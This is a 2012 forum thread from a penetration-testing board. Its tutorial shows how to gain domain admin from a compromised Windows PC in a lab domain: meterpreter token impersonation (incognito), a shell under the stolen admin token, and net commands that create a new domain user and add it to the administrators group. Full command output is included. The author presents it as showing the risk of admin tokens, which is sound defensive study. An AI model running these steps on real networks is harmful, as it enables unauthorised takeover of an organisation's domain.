How to create a domain user admin thru an exploited domain PC

**SilicaG** · 06-27-2012, 02:22 AM

Hi all!
the "how to" forum is closed, so I post here.

This is how to create a domain user admin thru an exploited domain PC with local machine administration rights.

The domain is called LAB.local based on Windows 2008R2. LABServer07 is the primary DC.
The exploited machine is joined to the domain and we got a meterpreter shell with local PC admin rights.

Basic command used after exploit:
Find process --> ps
Load incognito extension --> use incognito
Listing available tokens --> list_tokens -u
Impersonate token --> impersonate_token <token>
Get a command shell using the token --> execute -f cmd.exe -i -t -H -c
Add a domain User --> net user USER PASSWORD /add /domain
Add the creted user in domain admin --> net localgroup administrators USER /add /domain

Interact with session 1 and list process:

Code:

msf exploit(psexec) > sessions -i 1[*] Starting interaction with 1...

meterpreter > ps

Process list
============

 PID   Name              Arch  Session  User                           Path
 ---   ----              ----  -------  ----                           ----
 0     [System Process]
 4     System            x86   0        NT AUTHORITY\SYSTEM
 1736  smss.exe          x86   0        NT AUTHORITY\SYSTEM            \SystemRoot\System32\smss.exe
 1788  csrss.exe         x86   0        NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\csrss.exe
 1812  winlogon.exe      x86   0        NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\winlogon.exe
 1856  services.exe      x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\services.exe
 1868  lsass.exe         x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\lsass.exe
 2032  ibmpmsvc.exe      x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\ibmpmsvc.exe
 176   svchost.exe       x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\svchost.exe
 312   svchost.exe       x86   0        NT AUTHORITY\SERVIZIO DI RETE  C:\WINDOWS\system32\svchost.exe
 404   svchost.exe       x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\System32\svchost.exe
 508   EvtEng.exe        x86   0        NT AUTHORITY\SYSTEM            C:\Programmi\Intel\Wireless\Bin\EvtEng.exe
 604   S24EvMon.exe      x86   0        NT AUTHORITY\SYSTEM            C:\Programmi\Intel\Wireless\Bin\S24EvMon.exe
 824   svchost.exe       x86   0        NT AUTHORITY\SERVIZIO DI RETE  C:\WINDOWS\system32\svchost.exe
 848   svchost.exe       x86   0        NT AUTHORITY\SERVIZIO LOCALE   C:\WINDOWS\system32\svchost.exe
 1228  spoolsv.exe       x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\spoolsv.exe
 1304  svchost.exe       x86   0        NT AUTHORITY\SERVIZIO LOCALE   C:\WINDOWS\system32\svchost.exe
 1344  AcPrfMgrSvc.exe   x86   0        NT AUTHORITY\SYSTEM            C:\Programmi\ThinkPad\ConnectUtilities\AcPrfMgrSvc.exe
 1416  btwdins.exe       x86   0        NT AUTHORITY\SYSTEM            C:\Programmi\ThinkPad\Bluetooth Software\bin\btwdins.exe
 1484  RegSrvc.exe       x86   0        NT AUTHORITY\SYSTEM            C:\Programmi\Intel\Wireless\Bin\RegSrvc.exe
 1676  TpKmpSvc.exe      x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\TpKmpSVC.exe
 180   AcSvc.exe         x86   0        NT AUTHORITY\SYSTEM            C:\Programmi\ThinkPad\ConnectUtilities\AcSvc.exe
 700   MOMService.exe    x86   0        NT AUTHORITY\SYSTEM            C:\Programmi\Microsoft Forefront\Client Security\Client\Microsoft Operations Manager 2005\MOMService.exe
 224   wmiprvse.exe      x86   0        NT AUTHORITY\SERVIZIO DI RETE  C:\WINDOWS\system32\wbem\wmiprvse.exe
 948   SvcGuiHlpr.exe    x86   0        NT AUTHORITY\SYSTEM            C:\Programmi\ThinkPad\ConnectUtilities\SvcGuiHlpr.exe
 2580  alg.exe           x86   0        NT AUTHORITY\SERVIZIO LOCALE   C:\WINDOWS\System32\alg.exe
 3276  explorer.exe      x86   0        LAB\utente1                    C:\WINDOWS\Explorer.EXE
 3908  tp4mon.exe        x86   0        LAB\utente1                    C:\WINDOWS\system32\tp4mon.exe
 1112  igfxtray.exe      x86   0        LAB\utente1                    C:\WINDOWS\system32\igfxtray.exe
 1124  hkcmd.exe         x86   0        LAB\utente1                    C:\WINDOWS\system32\hkcmd.exe
 2192  igfxpers.exe      x86   0        LAB\utente1                    C:\WINDOWS\system32\igfxpers.exe
 1860  ACTray.exe        x86   0        LAB\utente1                    C:\Programmi\ThinkPad\ConnectUtilities\ACTray.exe
 2596  ACWLIcon.exe      x86   0        LAB\utente1                    C:\Programmi\ThinkPad\ConnectUtilities\ACWLIcon.exe
 2700  smax4pnp.exe      x86   0        LAB\utente1                    C:\Programmi\Analog Devices\Core\smax4pnp.exe
 2904  ctfmon.exe        x86   0        LAB\utente1                    C:\WINDOWS\system32\ctfmon.exe
 3076  BTTray.exe        x86   0        LAB\utente1                    C:\Programmi\ThinkPad\Bluetooth Software\BTTray.exe
 3572  cmd.exe           x86   0        LAB\admin                 C:\WINDOWS\system32\cmd.exe                                <---------- Look at these
 2912  cmd.exe           x86   0        LAB\admin                 C:\WINDOWS\system32\cmd.exe                                <---------- Look at these
 1472  rundll32.exe      x86   0        LAB\admin                 C:\WINDOWS\system32\rundll32.exe                           <---------- Look at these
 1256  cmd.exe           x86   0        LAB\admin                 C:\WINDOWS\system32\cmd.exe                                <---------- Look at these
 3044  msiexec.exe       x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\msiexec.exe
 3224  rundll32.exe      x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\rundll32.exe

Load extension, list token and impersonate domain admin

Code:

meterpreter > use incognito
Loading extension incognito...success.
meterpreter > list_tokens -u

Delegation Tokens Available
========================================
LAB\admin
LAB\utente1
NT AUTHORITY\SERVIZIO DI RETE
NT AUTHORITY\SERVIZIO LOCALE
NT AUTHORITY\SYSTEM

Impersonation Tokens Available
========================================
NT AUTHORITY\ACCESSO ANONIMO

meterpreter > impersonate_token lab\\admin          <---------- Double backslash DOMAIN\\name 
[+] Delegation token available
[+] Successfully impersonated user LAB\admin

meterpreter > getuid
Server username: lab\admin

Get a domain admin shell

Code:

meterpreter > execute -f cmd.exe -i -t -H -c
Process 3804 created.
Channel 1 created.
Microsoft Windows XP [Versione 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.


C:\WINDOWS\system32>

Create new domain user and join to the domain admins group

Code:

C:\WINDOWS\system32>net user TestUser Passw0rd /add /domain
net user TestUser Passw0rd /add /domain
La richiesta verrà elaborata dal controller di dominio per il dominio lab.local.

Esecuzione comando riuscita.


C:\WINDOWS\system32>net localgroup /domain
net localgroup /domain
La richiesta verrà elaborata dal controller di dominio per il dominio lab.local.


Alias per \\LABServer07.lab.local

-------------------------------------------------------------------------------
*Accesso compatibile precedente a Windows 2000
*Accesso DCOM a Servizi certificati
*Account Operators
*Administrators
*Backup Operators
*Cert Publishers
*Cryptographic Operators
*Distributed COM Users
*DnsAdmins
*Gruppo di accesso autorizzazione Windows
*Guests
*IIS_IUSRS
*Incoming Forest Trust Builders
*Lettori registri eventi
*Network Configuration Operators
*Ogg. autorizzati a replica passw. in controller sola lettura
*Ogg. non autoriz. a replica passw. in controller sola lettura
*Performance Log Users
*Performance Monitor Users
*Print Operators
*Replicator
*Server licenze di Terminal Server
*Server Operators
*Server RAS e IAS
*Users
*Utenti desktop remoto
Esecuzione comando riuscita.

C:\WINDOWS\system32>net localgroup administrators TestUser /add /domain
net localgroup administrators TestUser /add /domain
La richiesta verrà elaborata dal controller di dominio per il dominio lab.local.

Esecuzione comando riuscita.

Obviously the victim PC is an Italian version, so if you read "esecuzione comando riuscita" you have to read "Command completed successfully"

Thanks to all

**ddupPT** · 07-02-2012, 02:34 AM

Greate Job!

===========================
You're lucky,Baby !

If you have only a normal domain user and a local administrator,what you will do。

What I mean is that there is no domain admins logged on the PC you've hacked。

**SilicaG** · 07-03-2012, 01:35 AM

This is the purpose of the tutorial: illustrate the risk to use a domain admin user to run prosess remotely in a domain, such as policy or script. If there is not the token "you can't" create a domain user.

BackTrack Linux - Penetration Testing Distribution

Thread: How to create a domain user admin thru an exploited domain PC

Thread Tools

Search Thread

Display

Hybrid View

How to create a domain user admin thru an exploited domain PC

Re: How to create a domain user admin thru an exploited domain PC

Re: How to create a domain user admin thru an exploited domain PC

Similar Threads

Local Admin -> Domain Admin

need good resources to learn about group policy domain, admin

Local Admin --> Domain Admin ??

Social Engineering to gain VPN and domain admin

Server 2008 Domain Admin Password Recovery

Tags for this Thread

Posting Permissions